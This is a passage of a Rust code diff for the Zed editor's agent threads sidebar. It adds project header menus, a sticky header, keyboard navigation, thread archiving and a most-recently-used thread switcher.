path.file_name() else { + continue; + }; + let name: SharedString = name.to_string_lossy().into_owned().into(); + let path = path.clone(); + let project_group_key = project_group_key.clone(); + let multi_workspace = multi_workspace.clone(); + menu = menu.entry_with_end_slot_on_hover( + name.clone(), + None, + |_, _| {}, + IconName::Close, + "Remove Folder".into(), + move |_window, cx| { + multi_workspace + .update(cx, |multi_workspace, cx| { + multi_workspace.remove_folder_from_project_group( + &project_group_key, + &path, + cx, + ); + }) + .ok(); + }, + ); + } + + let menu = menu.separator().entry( + "Add Folder to Project", + Some(Box::new(AddFolderToProject)), + { + let project_group_key = project_group_key.clone(); + let multi_workspace = multi_workspace.clone(); + move |window, cx| { + multi_workspace + .update(cx, |multi_workspace, cx| { + multi_workspace.prompt_to_add_folders_to_project_group( + &project_group_key, + window, + cx, + ); + }) + .ok(); + } + }, + ); + + let group_count = multi_workspace + .upgrade() + .map_or(0, |mw| mw.read(cx).project_group_keys().count()); + let menu = if group_count > 1 { + let project_group_key = project_group_key.clone(); + let multi_workspace = multi_workspace.clone(); + menu.entry( + "Move to New Window", + Some(Box::new( + zed_actions::agents_sidebar::MoveWorkspaceToNewWindow, + )), + move |window, cx| { + multi_workspace + .update(cx, |multi_workspace, cx| { + multi_workspace.move_project_group_to_new_window( + &project_group_key, + window, + cx, + ); + }) + .ok(); + }, + ) + } else { + menu + }; + + let project_group_key = project_group_key.clone(); + let multi_workspace = multi_workspace.clone(); + menu.separator() + .entry("Remove Project", None, move |window, cx| { + multi_workspace + .update(cx, |multi_workspace, cx| { + multi_workspace.remove_project_group( + &project_group_key, + window, + cx, + ); + }) + .ok(); + }) + }); + + let this = this.clone(); + window + .subscribe(&menu, cx, move |_, _: &gpui::DismissEvent, _window, cx| { + this.update(cx, |sidebar, cx| { + sidebar.project_header_menu_ix = None; + cx.notify(); }) + .ok(); }) - .into_any_element(), + .detach(); + + Some(menu) + }) + .trigger( + IconButton::new( + SharedString::from(format!("{id_prefix}-ellipsis-menu-{ix}")), + IconName::Ellipsis, ) - } - SidebarEntry::RecentProject(project_entry) => { - let name = project_entry.name.clone(); - let full_path = project_entry.full_path.clone(); - let item_id: SharedString = - format!("recent-project-{:?}", project_entry.workspace_id).into(); - - Some( - ThreadItem::new(item_id, name.clone()) - .icon(IconName::Folder) - .selected(selected) - .highlight_positions(positions.clone()) - .tooltip(move |_, cx| { - Tooltip::with_meta(name.clone(), None, full_path.clone(), cx) - }) - .into_any_element(), + .selected_style(ButtonStyle::Tinted(TintColor::Accent)) + .icon_size(IconSize::Small), + ) + .anchor(gpui::Corner::TopRight) + .offset(gpui::Point { + x: px(0.), + y: px(1.), + }) + } + + fn render_sticky_header( + &self, + window: &mut Window, + cx: &mut Context, + ) -> Option { + let scroll_top = self.list_state.logical_scroll_top(); + + let &header_idx = self + .contents + .project_header_indices + .iter() + .rev() + .find(|&&idx| idx <= scroll_top.item_ix)?; + + let needs_sticky = header_idx < scroll_top.item_ix + || (header_idx == scroll_top.item_ix && scroll_top.offset_in_item > px(0.)); + + if !needs_sticky { + return None; + } + + let ListEntry::ProjectHeader { + key, + label, + highlight_positions, + has_running_threads, + waiting_thread_count, + is_active, + } = self.contents.entries.get(header_idx)? + else { + return None; + }; + + let is_focused = self.focus_handle.is_focused(window); + let is_selected = is_focused && self.selection == Some(header_idx); + + let header_element = self.render_project_header( + header_idx, + true, + key, + &label, + &highlight_positions, + *has_running_threads, + *waiting_thread_count, + *is_active, + is_selected, + cx, + ); + + let top_offset = self + .contents + .project_header_indices + .iter() + .find(|&&idx| idx > header_idx) + .and_then(|&next_idx| { + let bounds = self.list_state.bounds_for_item(next_idx)?; + let viewport = self.list_state.viewport_bounds(); + let y_in_viewport = bounds.origin.y - viewport.origin.y; + let header_height = bounds.size.height; + (y_in_viewport < header_height).then_some(y_in_viewport - header_height) + }) + .unwrap_or(px(0.)); + + let color = cx.theme().colors(); + let background = color + .title_bar_background + .blend(color.panel_background.opacity(0.2)); + + let element = v_flex() + .absolute() + .top(top_offset) + .left_0() + .w_full() + .bg(background) + .border_b_1() + .border_color(color.border.opacity(0.5)) + .child(header_element) + .shadow_xs() + .into_any_element(); + + Some(element) + } + + fn toggle_collapse( + &mut self, + path_list: &PathList, + _window: &mut Window, + cx: &mut Context, + ) { + if self.collapsed_groups.contains(path_list) { + self.collapsed_groups.remove(path_list); + } else { + self.collapsed_groups.insert(path_list.clone()); + } + self.serialize(cx); + self.update_entries(cx); + } + + fn dispatch_context(&self, window: &Window, cx: &Context) -> KeyContext { + let mut dispatch_context = KeyContext::new_with_defaults(); + dispatch_context.add("ThreadsSidebar"); + dispatch_context.add("menu"); + + let is_archived_search_focused = matches!(&self.view, SidebarView::Archive(archive) if archive.read(cx).is_filter_editor_focused(window, cx)); + + let identifier = if self.filter_editor.focus_handle(cx).is_focused(window) + || is_archived_search_focused + { + "searching" + } else { + "not_searching" + }; + + dispatch_context.add(identifier); + dispatch_context + } + + fn focus_in(&mut self, window: &mut Window, cx: &mut Context) { + if !self.focus_handle.is_focused(window) { + return; + } + + if let SidebarView::Archive(archive) = &self.view { + let has_selection = archive.read(cx).has_selection(); + if !has_selection { + archive.update(cx, |view, cx| view.focus_filter_editor(window, cx)); + } + } else if self.selection.is_none() { + self.filter_editor.focus_handle(cx).focus(window, cx); + } + } + + fn cancel(&mut self, _: &Cancel, window: &mut Window, cx: &mut Context) { + if self.reset_filter_editor_text(window, cx) { + self.update_entries(cx); + } else { + self.selection = None; + self.filter_editor.focus_handle(cx).focus(window, cx); + cx.notify(); + } + } + + fn focus_sidebar_filter( + &mut self, + _: &FocusSidebarFilter, + window: &mut Window, + cx: &mut Context, + ) { + self.selection = None; + if let SidebarView::Archive(archive) = &self.view { + archive.update(cx, |view, cx| { + view.clear_selection(); + view.focus_filter_editor(window, cx); + }); + } else { + self.filter_editor.focus_handle(cx).focus(window, cx); + } + + // When vim mode is active, the editor defaults to normal mode which + // blocks text input. Switch to insert mode so the user can type + // immediately. + if vim_mode_setting::VimModeSetting::get_global(cx).0 { + if let Ok(action) = cx.build_action("vim::SwitchToInsertMode", None) { + window.dispatch_action(action, cx); + } + } + + cx.notify(); + } + + fn reset_filter_editor_text(&mut self, window: &mut Window, cx: &mut Context) -> bool { + self.filter_editor.update(cx, |editor, cx| { + if editor.buffer().read(cx).len(cx).0 > 0 { + editor.set_text("", window, cx); + true + } else { + false + } + }) + } + + fn has_filter_query(&self, cx: &App) -> bool { + !self.filter_editor.read(cx).text(cx).is_empty() + } + + fn editor_move_down(&mut self, _: &MoveDown, window: &mut Window, cx: &mut Context) { + self.select_next(&SelectNext, window, cx); + if self.selection.is_some() { + self.focus_handle.focus(window, cx); + } + } + + fn editor_move_up(&mut self, _: &MoveUp, window: &mut Window, cx: &mut Context) { + self.select_previous(&SelectPrevious, window, cx); + if self.selection.is_some() { + self.focus_handle.focus(window, cx); + } + } + + fn editor_confirm(&mut self, window: &mut Window, cx: &mut Context) { + if self.selection.is_none() { + self.select_next(&SelectNext, window, cx); + } + if self.selection.is_some() { + self.focus_handle.focus(window, cx); + } + } + + fn select_next(&mut self, _: &SelectNext, _window: &mut Window, cx: &mut Context) { + let next = match self.selection { + Some(ix) if ix + 1 < self.contents.entries.len() => ix + 1, + Some(_) if !self.contents.entries.is_empty() => 0, + None if !self.contents.entries.is_empty() => 0, + _ => return, + }; + self.selection = Some(next); + self.list_state.scroll_to_reveal_item(next); + cx.notify(); + } + + fn select_previous(&mut self, _: &SelectPrevious, window: &mut Window, cx: &mut Context) { + match self.selection { + Some(0) => { + self.selection = None; + self.filter_editor.focus_handle(cx).focus(window, cx); + cx.notify(); + } + Some(ix) => { + self.selection = Some(ix - 1); + self.list_state.scroll_to_reveal_item(ix - 1); + cx.notify(); + } + None if !self.contents.entries.is_empty() => { + let last = self.contents.entries.len() - 1; + self.selection = Some(last); + self.list_state.scroll_to_reveal_item(last); + cx.notify(); + } + None => {} + } + } + + fn select_first(&mut self, _: &SelectFirst, _window: &mut Window, cx: &mut Context) { + if !self.contents.entries.is_empty() { + self.selection = Some(0); + self.list_state.scroll_to_reveal_item(0); + cx.notify(); + } + } + + fn select_last(&mut self, _: &SelectLast, _window: &mut Window, cx: &mut Context) { + if let Some(last) = self.contents.entries.len().checked_sub(1) { + self.selection = Some(last); + self.list_state.scroll_to_reveal_item(last); + cx.notify(); + } + } + + fn confirm(&mut self, _: &Confirm, window: &mut Window, cx: &mut Context) { + let Some(ix) = self.selection else { return }; + let Some(entry) = self.contents.entries.get(ix) else { + return; + }; + + match entry { + ListEntry::ProjectHeader { key, .. } => { + let path_list = key.path_list().clone(); + self.toggle_collapse(&path_list, window, cx); + } + ListEntry::Thread(thread) => { + let metadata = thread.metadata.clone(); + match &thread.workspace { + ThreadEntryWorkspace::Open(workspace) => { + let workspace = workspace.clone(); + self.activate_thread(metadata, &workspace, window, cx); + } + ThreadEntryWorkspace::Closed(path_list) => { + self.open_workspace_and_activate_thread( + metadata, + path_list.clone(), + window, + cx, + ); + } + } + } + ListEntry::ViewMore { + key, + is_fully_expanded, + .. + } => { + let path_list = key.path_list().clone(); + if *is_fully_expanded { + self.expanded_groups.remove(&path_list); + } else { + let current = self.expanded_groups.get(&path_list).copied().unwrap_or(0); + self.expanded_groups.insert(path_list, current + 1); + } + self.serialize(cx); + self.update_entries(cx); + } + ListEntry::DraftThread { .. } => { + // Already active — nothing to do. + } + ListEntry::NewThread { key, .. } => { + let path_list = key.path_list().clone(); + if let Some(workspace) = self.workspace_for_group(&path_list, cx) { + self.create_new_thread(&workspace, window, cx); + } else { + self.open_workspace_for_group(&path_list, window, cx); + } + } + } + } + + fn find_workspace_across_windows( + &self, + cx: &App, + predicate: impl Fn(&Entity, &App) -> bool, + ) -> Option<(WindowHandle, Entity)> { + cx.windows() + .into_iter() + .filter_map(|window| window.downcast::()) + .find_map(|window| { + let workspace = window.read(cx).ok().and_then(|multi_workspace| { + multi_workspace + .workspaces() + .find(|workspace| predicate(workspace, cx)) + .cloned() + })?; + Some((window, workspace)) + }) + } + + fn find_workspace_in_current_window( + &self, + cx: &App, + predicate: impl Fn(&Entity, &App) -> bool, + ) -> Option> { + self.multi_workspace.upgrade().and_then(|multi_workspace| { + multi_workspace + .read(cx) + .workspaces() + .find(|workspace| predicate(workspace, cx)) + .cloned() + }) + } + + fn load_agent_thread_in_workspace( + workspace: &Entity, + metadata: &ThreadMetadata, + focus: bool, + window: &mut Window, + cx: &mut App, + ) { + workspace.update(cx, |workspace, cx| { + workspace.reveal_panel::(window, cx); + }); + + if let Some(agent_panel) = workspace.read(cx).panel::(cx) { + agent_panel.update(cx, |panel, cx| { + panel.load_agent_thread( + Agent::from(metadata.agent_id.clone()), + metadata.session_id.clone(), + Some(metadata.folder_paths.clone()), + Some(metadata.title.clone()), + focus, + window, + cx, + ); + }); + } + } + + fn activate_thread_locally( + &mut self, + metadata: &ThreadMetadata, + workspace: &Entity, + window: &mut Window, + cx: &mut Context, + ) { + let Some(multi_workspace) = self.multi_workspace.upgrade() else { + return; + }; + + // Set active_entry eagerly so the sidebar highlight updates + // immediately, rather than waiting for a deferred AgentPanel + // event which can race with ActiveWorkspaceChanged clearing it. + self.active_entry = Some(ActiveEntry::Thread { + session_id: metadata.session_id.clone(), + workspace: workspace.clone(), + }); + self.record_thread_access(&metadata.session_id); + + multi_workspace.update(cx, |multi_workspace, cx| { + multi_workspace.activate(workspace.clone(), window, cx); + }); + + Self::load_agent_thread_in_workspace(workspace, metadata, true, window, cx); + + self.update_entries(cx); + } + + fn activate_thread_in_other_window( + &self, + metadata: ThreadMetadata, + workspace: Entity, + target_window: WindowHandle, + cx: &mut Context, + ) { + let target_session_id = metadata.session_id.clone(); + let workspace_for_entry = workspace.clone(); + + let activated = target_window + .update(cx, |multi_workspace, window, cx| { + window.activate_window(); + multi_workspace.activate(workspace.clone(), window, cx); + Self::load_agent_thread_in_workspace(&workspace, &metadata, true, window, cx); + }) + .log_err() + .is_some(); + + if activated { + if let Some(target_sidebar) = target_window + .read(cx) + .ok() + .and_then(|multi_workspace| { + multi_workspace.sidebar().map(|sidebar| sidebar.to_any()) + }) + .and_then(|sidebar| sidebar.downcast::().ok()) + { + target_sidebar.update(cx, |sidebar, cx| { + sidebar.active_entry = Some(ActiveEntry::Thread { + session_id: target_session_id.clone(), + workspace: workspace_for_entry.clone(), + }); + sidebar.record_thread_access(&target_session_id); + sidebar.update_entries(cx); + }); + } + } + } + + fn activate_thread( + &mut self, + metadata: ThreadMetadata, + workspace: &Entity, + window: &mut Window, + cx: &mut Context, + ) { + if self + .find_workspace_in_current_window(cx, |candidate, _| candidate == workspace) + .is_some() + { + self.activate_thread_locally(&metadata, &workspace, window, cx); + return; + } + + let Some((target_window, workspace)) = + self.find_workspace_across_windows(cx, |candidate, _| candidate == workspace) + else { + return; + }; + + self.activate_thread_in_other_window(metadata, workspace, target_window, cx); + } + + fn open_workspace_and_activate_thread( + &mut self, + metadata: ThreadMetadata, + path_list: PathList, + window: &mut Window, + cx: &mut Context, + ) { + let Some(multi_workspace) = self.multi_workspace.upgrade() else { + return; + }; + + let open_task = multi_workspace.update(cx, |this, cx| { + this.find_or_create_local_workspace(path_list, window, cx) + }); + + cx.spawn_in(window, async move |this, cx| { + let workspace = open_task.await?; + this.update_in(cx, |this, window, cx| { + this.activate_thread(metadata, &workspace, window, cx); + })?; + anyhow::Ok(()) + }) + .detach_and_log_err(cx); + } + + fn find_current_workspace_for_path_list( + &self, + path_list: &PathList, + cx: &App, + ) -> Option> { + self.find_workspace_in_current_window(cx, |workspace, cx| { + workspace_path_list(workspace, cx).paths() == path_list.paths() + }) + } + + fn find_open_workspace_for_path_list( + &self, + path_list: &PathList, + cx: &App, + ) -> Option<(WindowHandle, Entity)> { + self.find_workspace_across_windows(cx, |workspace, cx| { + workspace_path_list(workspace, cx).paths() == path_list.paths() + }) + } + + fn activate_archived_thread( + &mut self, + metadata: ThreadMetadata, + window: &mut Window, + cx: &mut Context, + ) { + ThreadMetadataStore::global(cx) + .update(cx, |store, cx| store.unarchive(&metadata.session_id, cx)); + + if !metadata.folder_paths.paths().is_empty() { + let path_list = metadata.folder_paths.clone(); + if let Some(workspace) = self.find_current_workspace_for_path_list(&path_list, cx) { + self.activate_thread_locally(&metadata, &workspace, window, cx); + } else if let Some((target_window, workspace)) = + self.find_open_workspace_for_path_list(&path_list, cx) + { + self.activate_thread_in_other_window(metadata, workspace, target_window, cx); + } else { + self.open_workspace_and_activate_thread(metadata, path_list, window, cx); + } + return; + } + + let active_workspace = self + .multi_workspace + .upgrade() + .map(|w| w.read(cx).workspace().clone()); + + if let Some(workspace) = active_workspace { + self.activate_thread_locally(&metadata, &workspace, window, cx); + } + } + + fn expand_selected_entry( + &mut self, + _: &SelectChild, + _window: &mut Window, + cx: &mut Context, + ) { + let Some(ix) = self.selection else { return }; + + match self.contents.entries.get(ix) { + Some(ListEntry::ProjectHeader { key, .. }) => { + if self.collapsed_groups.contains(key.path_list()) { + let path_list = key.path_list().clone(); + self.collapsed_groups.remove(&path_list); + self.update_entries(cx); + } else if ix + 1 < self.contents.entries.len() { + self.selection = Some(ix + 1); + self.list_state.scroll_to_reveal_item(ix + 1); + cx.notify(); + } + } + _ => {} + } + } + + fn collapse_selected_entry( + &mut self, + _: &SelectParent, + _window: &mut Window, + cx: &mut Context, + ) { + let Some(ix) = self.selection else { return }; + + match self.contents.entries.get(ix) { + Some(ListEntry::ProjectHeader { key, .. }) => { + if !self.collapsed_groups.contains(key.path_list()) { + self.collapsed_groups.insert(key.path_list().clone()); + self.update_entries(cx); + } + } + Some( + ListEntry::Thread(_) + | ListEntry::ViewMore { .. } + | ListEntry::NewThread { .. } + | ListEntry::DraftThread { .. }, + ) => { + for i in (0..ix).rev() { + if let Some(ListEntry::ProjectHeader { key, .. }) = self.contents.entries.get(i) + { + self.selection = Some(i); + self.collapsed_groups.insert(key.path_list().clone()); + self.update_entries(cx); + break; + } + } + } + None => {} + } + } + + fn toggle_selected_fold( + &mut self, + _: &editor::actions::ToggleFold, + _window: &mut Window, + cx: &mut Context, + ) { + let Some(ix) = self.selection else { return }; + + // Find the group header for the current selection. + let header_ix = match self.contents.entries.get(ix) { + Some(ListEntry::ProjectHeader { .. }) => Some(ix), + Some( + ListEntry::Thread(_) + | ListEntry::ViewMore { .. } + | ListEntry::NewThread { .. } + | ListEntry::DraftThread { .. }, + ) => (0..ix).rev().find(|&i| { + matches!( + self.contents.entries.get(i), + Some(ListEntry::ProjectHeader { .. }) + ) + }), + None => None, + }; + + if let Some(header_ix) = header_ix { + if let Some(ListEntry::ProjectHeader { key, .. }) = self.contents.entries.get(header_ix) + { + let path_list = key.path_list(); + if self.collapsed_groups.contains(path_list) { + self.collapsed_groups.remove(path_list); + } else { + self.selection = Some(header_ix); + self.collapsed_groups.insert(path_list.clone()); + } + self.update_entries(cx); + } + } + } + + fn fold_all( + &mut self, + _: &editor::actions::FoldAll, + _window: &mut Window, + cx: &mut Context, + ) { + for entry in &self.contents.entries { + if let ListEntry::ProjectHeader { key, .. } = entry { + self.collapsed_groups.insert(key.path_list().clone()); + } + } + self.update_entries(cx); + } + + fn unfold_all( + &mut self, + _: &editor::actions::UnfoldAll, + _window: &mut Window, + cx: &mut Context, + ) { + self.collapsed_groups.clear(); + self.update_entries(cx); + } + + fn stop_thread(&mut self, session_id: &acp::SessionId, cx: &mut Context) { + let Some(multi_workspace) = self.multi_workspace.upgrade() else { + return; + }; + + let workspaces: Vec<_> = multi_workspace.read(cx).workspaces().cloned().collect(); + for workspace in workspaces { + if let Some(agent_panel) = workspace.read(cx).panel::(cx) { + let cancelled = + agent_panel.update(cx, |panel, cx| panel.cancel_thread(session_id, cx)); + if cancelled { + return; + } + } + } + } + + fn archive_thread( + &mut self, + session_id: &acp::SessionId, + window: &mut Window, + cx: &mut Context, + ) { + ThreadMetadataStore::global(cx).update(cx, |store, cx| store.archive(session_id, cx)); + + // If we're archiving the currently focused thread, move focus to the + // nearest thread within the same project group. We never cross group + // boundaries — if the group has no other threads, clear focus and open + // a blank new thread in the panel instead. + if self + .active_entry + .as_ref() + .is_some_and(|e| e.is_active_thread(session_id)) + { + let current_pos = self.contents.entries.iter().position(|entry| { + matches!(entry, ListEntry::Thread(t) if &t.metadata.session_id == session_id) + }); + + // Find the workspace that owns this thread's project group by + // walking backwards to the nearest ProjectHeader and looking up + // an open workspace for that group's path_list. + let group_workspace = current_pos.and_then(|pos| { + let path_list = + self.contents.entries[..pos] + .iter() + .rev() + .find_map(|e| match e { + ListEntry::ProjectHeader { key, .. } => Some(key.path_list()), + _ => None, + })?; + self.workspace_for_group(path_list, cx) + }); + + let next_thread = current_pos.and_then(|pos| { + let group_start = self.contents.entries[..pos] + .iter() + .rposition(|e| matches!(e, ListEntry::ProjectHeader { .. })) + .map_or(0, |i| i + 1); + let group_end = self.contents.entries[pos + 1..] + .iter() + .position(|e| matches!(e, ListEntry::ProjectHeader { .. })) + .map_or(self.contents.entries.len(), |i| pos + 1 + i); + + let above = self.contents.entries[group_start..pos] + .iter() + .rev() + .find_map(|entry| { + if let ListEntry::Thread(t) = entry { + Some(t) + } else { + None + } + }); + + above.or_else(|| { + self.contents.entries[pos + 1..group_end] + .iter() + .find_map(|entry| { + if let ListEntry::Thread(t) = entry { + Some(t) + } else { + None + } + }) + }) + }); + + if let Some(next) = next_thread { + let next_metadata = next.metadata.clone(); + // Use the thread's own workspace when it has one open (e.g. an absorbed + // linked worktree thread that appears under the main workspace's header + // but belongs to its own workspace). Loading into the wrong panel binds + // the thread to the wrong project, which corrupts its stored folder_paths + // when metadata is saved via ThreadMetadata::from_thread. + let target_workspace = match &next.workspace { + ThreadEntryWorkspace::Open(ws) => Some(ws.clone()), + ThreadEntryWorkspace::Closed(_) => group_workspace, + }; + if let Some(ref ws) = target_workspace { + self.active_entry = Some(ActiveEntry::Thread { + session_id: next_metadata.session_id.clone(), + workspace: ws.clone(), + }); + } + self.record_thread_access(&next_metadata.session_id); + + if let Some(workspace) = target_workspace { + if let Some(agent_panel) = workspace.read(cx).panel::(cx) { + agent_panel.update(cx, |panel, cx| { + panel.load_agent_thread( + Agent::from(next_metadata.agent_id.clone()), + next_metadata.session_id.clone(), + Some(next_metadata.folder_paths.clone()), + Some(next_metadata.title.clone()), + true, + window, + cx, + ); + }); + } + } + } else { + if let Some(workspace) = &group_workspace { + self.active_entry = Some(ActiveEntry::Draft(workspace.clone())); + if let Some(agent_panel) = workspace.read(cx).panel::(cx) { + agent_panel.update(cx, |panel, cx| { + panel.new_thread(&NewThread, window, cx); + }); + } + } + } + } + } + + fn remove_selected_thread( + &mut self, + _: &RemoveSelectedThread, + window: &mut Window, + cx: &mut Context, + ) { + let Some(ix) = self.selection else { + return; + }; + let Some(ListEntry::Thread(thread)) = self.contents.entries.get(ix) else { + return; + }; + match thread.status { + AgentThreadStatus::Running | AgentThreadStatus::WaitingForConfirmation => return, + AgentThreadStatus::Completed | AgentThreadStatus::Error => {} + } + + let session_id = thread.metadata.session_id.clone(); + self.archive_thread(&session_id, window, cx) + } + + fn record_thread_access(&mut self, session_id: &acp::SessionId) { + self.thread_last_accessed + .insert(session_id.clone(), Utc::now()); + } + + fn record_thread_message_sent(&mut self, session_id: &acp::SessionId) { + self.thread_last_message_sent_or_queued + .insert(session_id.clone(), Utc::now()); + } + + fn mru_threads_for_switcher(&self, cx: &App) -> Vec { + let mut current_header_label: Option = None; + let mut current_header_path_list: Option = None; + let mut entries: Vec = self + .contents + .entries + .iter() + .filter_map(|entry| match entry { + ListEntry::ProjectHeader { label, key, .. } => { + current_header_label = Some(label.clone()); + current_header_path_list = Some(key.path_list().clone()); + None + } + ListEntry::Thread(thread) => { + let workspace = match &thread.workspace { + ThreadEntryWorkspace::Open(workspace) => Some(workspace.clone()), + ThreadEntryWorkspace::Closed(_) => current_header_path_list + .as_ref() + .and_then(|pl| self.workspace_for_group(pl, cx)), + }?; + let notified = self + .contents + .is_thread_notified(&thread.metadata.session_id); + let timestamp: SharedString = format_history_entry_timestamp( + self.thread_last_message_sent_or_queued + .get(&thread.metadata.session_id) + .copied() + .or(thread.metadata.created_at) + .unwrap_or(thread.metadata.updated_at), + ) + .into(); + Some(ThreadSwitcherEntry { + session_id: thread.metadata.session_id.clone(), + title: thread.metadata.title.clone(), + icon: thread.icon, + icon_from_external_svg: thread.icon_from_external_svg.clone(), + status: thread.status, + metadata: thread.metadata.clone(), + workspace, + project_name: current_header_label.clone(), + worktrees: thread + .worktrees + .iter() + .map(|wt| ThreadItemWorktreeInfo { + name: wt.name.clone(), + full_path: wt.full_path.clone(), + highlight_positions: Vec::new(), + }) + .collect(), + diff_stats: thread.diff_stats, + is_title_generating: thread.is_title_generating, + notified, + timestamp, + }) + } + _ => None, + }) + .collect(); + + entries.sort_by(|a, b| { + let a_accessed = self.thread_last_accessed.get(&a.session_id); + let b_accessed = self.thread_last_accessed.get(&b.session_id); + + match (a_accessed, b_accessed) { + (Some(a_time), Some(b_time)) => b_time.cmp(a_time), + (Some(_), None) => std::cmp::Ordering::Less, + (None, Some(_)) => std::cmp::Ordering::Greater, + (None, None) => { + let a_sent = self.thread_last_message_sent_or_queued.get(&a.session_id); + let b_sent = self.thread_last_message_sent_or_queued.get(&b.session_id); + + match (a_sent, b_sent) { + (Some(a_time), Some(b_time)) => b_time.cmp(a_time), + (Some(_), None) => std::cmp::Ordering::Less, + (None, Some(_)) => std::cmp::Ordering::Greater, + (None, None) => { + let a_time = a.metadata.created_at.or(Some(a.metadata.updated_at)); + let b_time = b.metadata.created_at.or(Some(b.metadata.updated_at)); + b_time.cmp(&a_time) + } + } + } + } + }); + + entries + } + + fn dismiss_thread_switcher(&mut self, cx: &mut Context) { + self.thread_switcher = None; + self._thread_switcher_subscriptions.clear(); + if let Some(mw) = self.multi_workspace.upgrade() { + mw.update(cx, |mw, cx| { + mw.set_sidebar_overlay(None, cx); + }); + } + } + + fn on_toggle_thread_switcher( + &mut self, + action: &ToggleThreadSwitcher, + window: &mut Window, + cx: &mut Context, + ) { + self.toggle_thread_switcher_impl(action.select_last, window, cx); + } + + fn toggle_thread_switcher_impl( + &mut self, + select_last: bool, + window: &mut Window, + cx: &mut Context, + ) { + if let Some(thread_switcher) = &self.thread_switcher { + thread_switcher.update(cx, |switcher, cx| { + if select_last { + switcher.select_last(cx); + } else { + switcher.cycle_selection(cx); + } + }); + return; + } + + let entries = self.mru_threads_for_switcher(cx); + if entries.len() < 2 { + return; + } + + let weak_multi_workspace = self.multi_workspace.clone(); + + let original_metadata = match &self.active_entry { + Some(ActiveEntry::Thread { session_id, .. }) => entries + .iter() + .find(|e| &e.session_id == session_id) + .map(|e| e.metadata.clone()), + _ => None, + }; + let original_workspace = self + .multi_workspace + .upgrade() + .map(|mw| mw.read(cx).workspace().clone()); + + let thread_switcher = cx.new(|cx| ThreadSwitcher::new(entries, select_last, window, cx)); + + let mut subscriptions = Vec::new(); + + subscriptions.push(cx.subscribe_in(&thread_switcher, window, { + let thread_switcher = thread_switcher.clone(); + move |this, _emitter, event: &ThreadSwitcherEvent, window, cx| match event { + ThreadSwitcherEvent::Preview { + metadata, + workspace, + } => { + if let Some(mw) = weak_multi_workspace.upgrade() { + mw.update(cx, |mw, cx| { + mw.activate(workspace.clone(), window, cx); + }); + } + this.active_entry = Some(ActiveEntry::Thread { + session_id: metadata.session_id.clone(), + workspace: workspace.clone(), + }); + this.update_entries(cx); + Self::load_agent_thread_in_workspace(workspace, metadata, false, window, cx); + let focus = thread_switcher.focus_handle(cx); + window.focus(&focus, cx); + } + ThreadSwitcherEvent::Confirmed { + metadata, + workspace, + } => { + if let Some(mw) = weak_multi_workspace.upgrade() { + mw.update(cx, |mw, cx| { + mw.activate(workspace.clone(), window, cx); + }); + } + this.record_thread_access(&metadata.session_id); + this.active_entry = Some(ActiveEntry::Thread { + session_id: metadata.session_id.clone(), + workspace: workspace.clone(), + }); + this.update_entries(cx); + Self::load_agent_thread_in_workspace(workspace, metadata, false, window, cx); + this.dismiss_thread_switcher(cx); + workspace.update(cx, |workspace, cx| { + workspace.focus_panel::(window, cx); + }); + } + ThreadSwitcherEvent::Dismissed => { + if let Some(mw) = weak_multi_workspace.upgrade() { + if let Some(original_ws) = &original_workspace { + mw.update(cx, |mw, cx| { + mw.activate(original_ws.clone(), window, cx); + }); + } + } + if let Some(metadata) = &original_metadata { + if let Some(original_ws) = &original_workspace { + this.active_entry = Some(ActiveEntry::Thread { + session_id: metadata.session_id.clone(), + workspace: original_ws.clone(), + }); + } + this.update_entries(cx); + if let Some(original_ws) = &original_workspace { + Self::load_agent_thread_in_workspace( + original_ws, + metadata, + false, + window, + cx, + ); + } + } + this.dismiss_thread_switcher(cx); + } + } + })); + + subscriptions.push(cx.subscribe_in( + &thread_switcher, + window, + |this, _emitter, _event: &gpui::DismissEvent, _window, cx| { + this.dismiss_thread_switcher(cx); + }, + )); + + let focus = thread_switcher.focus_handle(cx); + let overlay_view = gpui::AnyView::from(thread_switcher.clone()); + + // Replay the initial preview that was emitted during construction + // before subscriptions were wired up. + let initial_preview = thread_switcher + .read(cx) + .selected_entry() + .map(|entry| (entry.metadata.clone(), entry.workspace.clone())); + + self.thread_switcher = Some(thread_switcher); + self._thread_switcher_subscriptions = subscriptions; + if let Some(mw) = self.multi_workspace.upgrade() { + mw.update(cx, |mw, cx| { + mw.set_sidebar_overlay(Some(overlay_view), cx); + }); + } + + if let Some((metadata, workspace)) = initial_preview { + if let Some(mw) = self.multi_workspace.upgrade() { + mw.update(cx, |mw, cx| { + mw.activate(workspace.clone(), window, cx); + }); + } + self.active_entry = Some(ActiveEntry::Thread { + session_id: metadata.session_id.clone(), + workspace: workspace.clone(), + }); + self.update_entries(cx); + Self::load_agent_thread_in_workspace(&workspace, &metadata, false, window, cx); + } + + window.focus(&focus, cx); + } + + fn render_thread( + &self, + ix: usize, + thread: &ThreadEntry, + is_active: bool, + is_focused: bool, + cx: &mut Context, + ) -> AnyElement { + let has_notification = self + .contents + .is_thread_notified(&thread.metadata.session_id); + + let title: SharedString = thread.metadata.title.clone(); + let metadata = thread.metadata.clone(); + let thread_workspace = thread.workspace.clone(); + + let is_hovered = self.hovered_thread_index == Some(ix); + let is_selected = is_active; + let is_running = matches!( + thread.status, + AgentThreadStatus::Running | AgentThreadStatus::WaitingForConfirmation + ); + + let session_id_for_delete = thread.metadata.session_id.clone(); + let focus_handle = self.focus_handle.clone(); + + let id = SharedString::from(format!("thread-entry-{}", ix)); + + let color = cx.theme().colors(); + let sidebar_bg = color + .title_bar_background + .blend(color.panel_background.opacity(0.25)); + + let timestamp = format_history_entry_timestamp( + self.thread_last_message_sent_or_queued + .get(&thread.metadata.session_id) + .copied() + .or(thread.metadata.created_at) + .unwrap_or(thread.metadata.updated_at), + ); + + ThreadItem::new(id, title) + .base_bg(sidebar_bg) + .icon(thread.icon) + .status(thread.status) + .when_some(thread.icon_from_external_svg.clone(), |this, svg| { + this.custom_icon_from_external_svg(svg) + }) + .worktrees( + thread + .worktrees + .iter() + .map(|wt| ThreadItemWorktreeInfo { + name: wt.name.clone(), + full_path: wt.full_path.clone(), + highlight_positions: wt.highlight_positions.clone(), + }) + .collect(), + ) + .timestamp(timestamp) + .highlight_positions(thread.highlight_positions.to_vec()) + .title_generating(thread.is_title_generating) + .notified(has_notification) + .when(thread.diff_stats.lines_added > 0, |this| { + this.added(thread.diff_stats.lines_added as usize) + }) + .when(thread.diff_stats.lines_removed > 0, |this| { + this.removed(thread.diff_stats.lines_removed as usize) + }) + .selected(is_selected) + .focused(is_focused) + .hovered(is_hovered) + .on_hover(cx.listener(move |this, is_hovered: &bool, _window, cx| { + if *is_hovered { + this.hovered_thread_index = 